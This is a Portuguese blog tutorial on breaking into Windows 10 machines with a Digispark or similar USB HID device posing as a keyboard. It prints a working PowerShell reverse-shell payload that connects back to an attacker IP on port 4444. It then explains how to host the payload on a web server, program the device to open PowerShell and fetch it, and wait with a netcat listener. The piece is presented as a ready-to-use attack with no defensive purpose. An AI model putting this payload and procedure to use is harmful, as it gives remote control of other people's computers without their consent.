Invadindo Windows 10 usando dispositivos HID (Digispark)



Resultado de imagem para hack windows
Você já deve ter visto algumas demonstrações de invasão usando dispositivos parecidos como esses aqui a baixo, não é?

RUBBER DUCKY
Resultado de imagem para rubber ducky usb

RASPBERRY PI
Resultado de imagem para raspberry
DIGISPARK ATTINY85

Resultado de imagem para digispark

Existe outros Hardwares também que poderiam entrar na lista, mas esses 3 são os mais usados para efetuar ataques de forma automatizadas e com uso de engenharia social. E vocês podem encontrar esses dispositivos em sites especializados em Eletrônica ou no Ali Express, muitos preferem exportar que sai mais barato geralmente, o problema mesmo é a demora para chegar na sua casa.

Nesse tutorial será usado o Digispark para efetuar o ataque, mas como dito qualquer um desses 3 dispositivos ou outro que tem suporte a HID (Dispositivo de Interface Humana) que pode simular um Teclado ou Mouse.

Antes de tudo você deve instalar o seu dispositivo se o mesmo for Digispark aqui vai um Tutorial

Após ter instalado o seu dispositivo agora vamos ao que interessa:

1- Vamos criar o payload ao qual irá ser feita a conexão.
CÓDIGO: $sm=(New-Object Net.Sockets.TCPClient("HOST_IP_ADDRESS",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

No "HOST IP ADDRESS" você vai colocar o IP da sua máquina, ou seja, o seu IP atacante.
Após a configuração salve o arquivo como "payload.ps1" ou outro nome que desejar.

2- Após a criação do Payload você pode jogar em um servidor Web, pode usar até mesmo o apache2 nativo do Kali Linux, caso não esteja no Kali pode usar qualquer outro servidor Web.

3- Agora vamos criar o script que vai ser usado no Digispark.
CÓDIGO:



"O delay pode ser modificado conforme o desempenho do seu computador, sendo ele lento ou rápido.
Então explicando o script, vamos ter a biblioteca DigiKeyboard que serve justamente para programar HID, depois disso vamos ter a instrução que o Digispark vai fazer ao ser plugado que vai abrir o menu "Executar" do Windows e abrir o "PowerShell" e após o delay digitar o código que vai efetuar a execução do payload via Web, e não se esqueça de setar o IP DO SERVIDOR ao qual payload está hospedado."

4- Depois de ter modificado o script você pode clicar em Carregar e em seguida por o Digispark para fazer o upload do Script nele.


5- Após fazer os processos abra uma conexão com netcat, digite: nc -vlp 4444
E com isso é só plugar na máquina e esperar receber a conexão.


EXEMPLO PRÁTICO



Escrito por Joas Antonio


Comentários

Postar um comentário